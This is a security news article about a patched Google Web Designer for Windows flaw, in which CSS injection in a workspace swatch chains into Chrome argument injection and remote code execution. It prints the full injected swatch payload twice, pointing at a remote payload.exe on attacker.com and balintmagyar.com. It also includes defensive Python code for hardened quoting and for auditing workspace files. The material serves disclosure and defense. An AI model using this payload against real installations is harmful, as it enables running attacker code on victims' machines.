By abusing CSS injection in the document configuration file, attackers can execute arbitrary commands on a victim’s machine through Google Web Designer’s internal ninja-shell API, which the application uses to launch Chrome.
Background: CSS Injection in gwd_workspace.json
Google Web Designer stores custom color palettes in gwd_workspace.json, under the color.customColorPalettes array.
Solid colors are parsed into RGBA components and re-serialized, so they cannot carry extra CSS, but gradient definitions are passed through without the same strict sanitization. An attacker can therefore insert arbitrary CSS rules into the css field of a swatch:
```json
"color.customColorPalettes": [
  {
    "name": "evilSwatch",
    "color_data": [
      {
        "css": "-webkit-linear-gradient;background:url('//ninja-shell/api/browser?method=open&usedefaultapp=false&browser=chrome&url=//%22%20--browser-subprocess-path%3D%5C%5Cattacker.com%5Cpayload.exe%20--headless%20%22')"
      }
    ]
  }
]
```
When the Swatches UI renders the palette, the injected background:url() rule makes the embedded browser fetch that URL, which is a request to the internal ninja-shell API: the bridge between the JavaScript application shell and native OS operations.
Command Injection via Internal API
Google Web Designer exposes an internal REST API at //ninja-shell/api/browser that the application shell uses to open URLs in Chrome:

```text
GET //ninja-shell/api/browser?method=open
    &usedefaultapp=false
    &browser=chrome
    &url=https%3A%2F%2Faccounts.google.com%2F...
```
Because the url parameter is not escaped before it is placed inside a quoted argument on the Chrome command line, an attacker can close the quotes early and append additional Chrome switches.
For example, injecting %22%20--browser-subprocess-path%3D%5C%5Cbalintmagyar.com%5Cpayload.exe%20--headless%20%22 as the url value (which decodes to " --browser-subprocess-path=\\balintmagyar.com\payload.exe --headless ") causes Chrome to launch with:

```text
chrome.exe "//" --browser-subprocess-path=\\balintmagyar.com\payload.exe --headless ""
```

--browser-subprocess-path is a legitimate Chromium switch that sets the executable Chrome spawns for its child processes (renderer, GPU, utility), so the attacker-controlled binary runs as soon as Chrome starts; --headless keeps the browser from showing a window, and the trailing "" is the empty argument left over from the original closing quote.
By hosting payload.exe on a WebDAV server and referencing it via a UNC path, the attacker has Windows fetch the executable over the network transparently (WebDAV is the practical choice here because it works over HTTP/HTTPS to an internet host, where outbound SMB is usually blocked). The result is full remote code execution when a user clicks the custom swatch.
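The argument-injection step above, as an added example that is not code from the original article or from Google Web Designer itself. It assumes the vulnerable shell built the command line by string concatenation (as the quoted command line suggests) and models the Windows side: parse_windows_cmdline is a small reimplementation of the CommandLineToArgvW splitting rules, and the hardened builder uses Python’s subprocess.list2cmdline, which applies the matching escaping. The URL value is the one from the advisory after percent-decoding; chrome.exe is assumed as the binary name.

```python
import subprocess
from urllib.parse import urlsplit

CHROME = "chrome.exe"

# The injected url value from the advisory, after percent-decoding
# (%22 -> ", %5C -> \, %20 -> space).
MALICIOUS_URL = r'//" --browser-subprocess-path=\\balintmagyar.com\payload.exe --headless "'


def build_cmdline_vulnerable(url):
    """Model of the unsafe pattern (assumption, not GWD's actual code): the URL is
    wrapped in quotes by string concatenation, so a '"' inside it closes the argument."""
    return f'{CHROME} "{url}"'


def is_safe_url(url):
    """Allowlist check: only absolute http(s) URLs with a host may be opened.
    Protocol-relative (//...), UNC and file: paths are all rejected."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def build_cmdline_hardened(url):
    """Validate first, then let list2cmdline apply the Windows quoting rules
    (an embedded '"' becomes '\\"', backslashes in front of it are doubled)."""
    if not is_safe_url(url):
        raise ValueError(f"refusing to open non-http(s) URL: {url!r}")
    return subprocess.list2cmdline([CHROME, url])


def parse_windows_cmdline(cmdline):
    """Minimal model of how CommandLineToArgvW splits a command line, i.e. what
    Chrome's startup code sees: whitespace separates arguments outside quotes,
    '"' toggles quoting, 2n backslashes before '"' yield n literal backslashes,
    2n+1 yield n backslashes plus a literal '"'. Backslashes not followed by '"'
    are literal. The legacy '""' special case is deliberately not modelled."""
    argv, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (count // 2))
                if count % 2:             # odd run: the quote is a literal character
                    cur.append('"')
                    j += 1
            else:
                cur.append("\\" * count)  # run not followed by a quote: literal
            have_arg, i = True, j
        elif c == '"':
            in_quotes, have_arg, i = not in_quotes, True, i + 1
        elif c in " \t" and not in_quotes:
            if have_arg:
                argv.append("".join(cur))
                cur, have_arg = [], False
            i += 1
        else:
            cur.append(c)
            have_arg, i = True, i + 1
    if have_arg:
        argv.append("".join(cur))
    return argv


def demo():
    """Return (argv seen by Chrome with the vulnerable builder,
    argv seen by Chrome when the URL is quoted properly)."""
    vulnerable_argv = parse_windows_cmdline(build_cmdline_vulnerable(MALICIOUS_URL))
    quoted_argv = parse_windows_cmdline(subprocess.list2cmdline([CHROME, MALICIOUS_URL]))
    return vulnerable_argv, quoted_argv


if __name__ == "__main__":
    vulnerable, quoted = demo()
    print("vulnerable argv:", vulnerable)   # extra switches injected
    print("quoted argv:   ", quoted)        # the whole URL stays one argument
    print("validator rejects payload:", not is_safe_url(MALICIOUS_URL))
```

Proper quoting alone already keeps the injected text inside a single argument (Chrome would then just fail to open a nonsense URL); the scheme allowlist is the second layer, since it also stops UNC, file: and protocol-relative targets that are harmless to the command line but not to the user.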
Impact and Mitigation
This vulnerability (classified as CWE-78, OS Command Injection) affects Google Web Designer for Windows builds before 16.4.0.0711 (released July 29, 2025).
macOS and Linux versions are not exploitable due to differing subprocess handling.
A successful attack requires minimal user interaction: opening a malicious ad document and selecting the Swatches option in the color picker.
Google’s Vulnerability Reward Program awarded $3,500 for this submission. Users should update to version 16.4.0.0711 or later, which enforces strict sanitization of gradient definitions and properly escapes command-line arguments passed through the internal API.
Security teams are advised to audit any gwd_workspace.json files, especially ones received inside shared ad documents or templates, for unexpected url() rules or gradient definitions that contain anything beyond color stops, and to restrict outbound access to network file shares (SMB and WebDAV) where possible.
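The strict gradient sanitization described in the background section and the gwd_workspace.json audit recommended here, as one added example (not code from the original article or from Google Web Designer). It takes an allowlist approach: a swatch’s css value must be either a single color or a gradient function whose arguments are only a direction and color stops; anything else is reported together with the suspicious substrings it contains. The workspace fragment is constructed for the example and the grammar is a deliberately conservative assumption about what a swatch may contain, not the grammar the fixed product uses.

```python
import json
import re

# Constructed sample of a gwd_workspace.json fragment: two benign swatches and
# the injected one from the advisory. Not a file taken from a real installation.
SAMPLE_WORKSPACE = """
{
  "color.customColorPalettes": [
    {"name": "brand", "color_data": [
      {"css": "rgba(18, 52, 86, 1)"},
      {"css": "-webkit-linear-gradient(top, #ff0000 0%, #0000ff 100%)"}
    ]},
    {"name": "evilSwatch", "color_data": [
      {"css": "-webkit-linear-gradient;background:url('//ninja-shell/api/browser?method=open&usedefaultapp=false&browser=chrome&url=//%22%20--browser-subprocess-path%3D%5C%5Cattacker.com%5Cpayload.exe%20--headless%20%22')"}
    ]}
  ]
}
"""

# Allowlist grammar (assumption): hex, rgb()/rgba()/hsl()/hsla() or a named color,
# optional stop position, optional leading direction. Anything else fails closed.
_COLOR = r"(?:#[0-9a-fA-F]{3,8}|(?:rgba?|hsla?)\(\s*[\d.]+%?(?:\s*,\s*[\d.]+%?){2,3}\s*\)|[a-zA-Z]+)"
_LENGTH = r"(?:-?\d+(?:\.\d+)?(?:%|px|em|rem))"
_STOP = rf"{_COLOR}(?:\s+{_LENGTH})?"
_SIDE = r"(?:top|bottom|left|right|center)"
_DIRECTION = rf"(?:(?:to\s+)?{_SIDE}(?:\s+{_SIDE})?|-?\d+(?:\.\d+)?(?:deg|grad|rad|turn))"

SOLID_RE = re.compile(rf"^{_COLOR}$")
GRADIENT_RE = re.compile(
    rf"^(?:-webkit-|-moz-|-o-)?(?:linear|radial)-gradient\(\s*"
    rf"(?:{_DIRECTION}\s*,\s*)?{_STOP}(?:\s*,\s*{_STOP})+\s*\)$"
)

# Substrings that have no business in a color swatch; reported to explain a rejection.
RED_FLAGS = (";", "{", "}", "url(", "ninja-shell", "expression(", "@import", "javascript:")


def classify_swatch(css):
    """Return ('solid' | 'gradient' | 'rejected', [red flags found])."""
    css = css.strip()
    if SOLID_RE.fullmatch(css):
        return "solid", []
    if GRADIENT_RE.fullmatch(css):
        return "gradient", []
    return "rejected", [flag for flag in RED_FLAGS if flag in css]


def audit_workspace(text):
    """Walk color.customColorPalettes[].color_data[].css and return every swatch
    that does not fit the allowlist, with its palette name and the flags hit."""
    doc = json.loads(text)
    findings = []
    for palette in doc.get("color.customColorPalettes", []):
        for entry in palette.get("color_data", []):
            css = entry.get("css", "")
            verdict, flags = classify_swatch(css)
            if verdict == "rejected":
                findings.append({"palette": palette.get("name", "?"), "css": css, "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in audit_workspace(SAMPLE_WORKSPACE):
        print(f"[{finding['palette']}] flags={finding['flags']} css={finding['css'][:60]}...")
```

To run it against a real installation, replace SAMPLE_WORKSPACE with the contents of the user’s gwd_workspace.json; a clean file produces no findings. The same classify_swatch check, applied when a palette is loaded rather than after the fact, is what a sanitizing fix looks like: the gradient string is either rebuilt from the parsed stops or dropped, never echoed into the stylesheet.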
With this discovery, Magyar highlights the latent risk of intermixing native and web components in modern desktop applications: a web-layer bug becomes a native one as soon as an internal API turns attacker-controlled strings into command lines.
While CSS injection rarely escalates to code execution on its own, this chain of vulnerabilities underscores the importance of rigorous input validation and of sandboxing internal APIs that reach the operating system.
Continuous review of third-party tools remains essential to maintaining a secure development and publishing pipeline.
The post Google Web Designer Vulnerability Could Let Hackers Take Control of PCs appeared first on Cyber Security News.
